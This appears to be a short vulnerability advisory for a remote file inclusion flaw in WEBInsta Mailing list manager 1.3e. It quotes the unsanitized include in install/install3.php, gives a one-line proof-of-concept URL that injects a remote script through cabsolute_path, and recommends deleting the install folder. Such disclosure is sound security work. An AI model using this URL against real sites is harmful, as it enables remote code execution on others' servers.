WEBInsta Mailing list manager (cabsolute_path) 1.3e RFI

±-------------------------------------------------------------------
+

• WEBInsta Mailing list manager (cabsolute_path) 1.3e RFI
• Original advisory:
• http://www.bb-pcsecurity.de/Websecurity/311/org/+ WEBInsta_Mailing_list_manager_(cabsolute_path)_1.3e_RFI.htm

±-------------------------------------------------------------------
+

• Affected Software .: WEBInsta™ Mailing list manager 1.3e
• Venedor …: http://www.webinsta.com
• Class …: Remote File Inclusion
• Risk …: high (Remote File Execution)
• Found by …: Philipp Niedziela
• Contact …: webmaster[at]bb-pcsecurity[.]de

±-------------------------------------------------------------------
+

• Code /istall/install3.php:
• …
• if($database=="none")
• {
• include($cabsolute_path.'inc/adodbt/db.inc');
• $conn = &ADONewConnection();
• …

±-------------------------------------------------------------------
+

• $cabsolute_path is not properly sanitized before being used

±-------------------------------------------------------------------
+

• Solution:
• Delete folder "install" after installation!!

±-------------------------------------------------------------------
+

• PoC:
• http://[target]/install/install3.php?database=none&cabsolute_path=[script]

±-------------------------------------------------------------------
+

• Greets: /str0ke

±------------------------[ E O F ]----------------------------------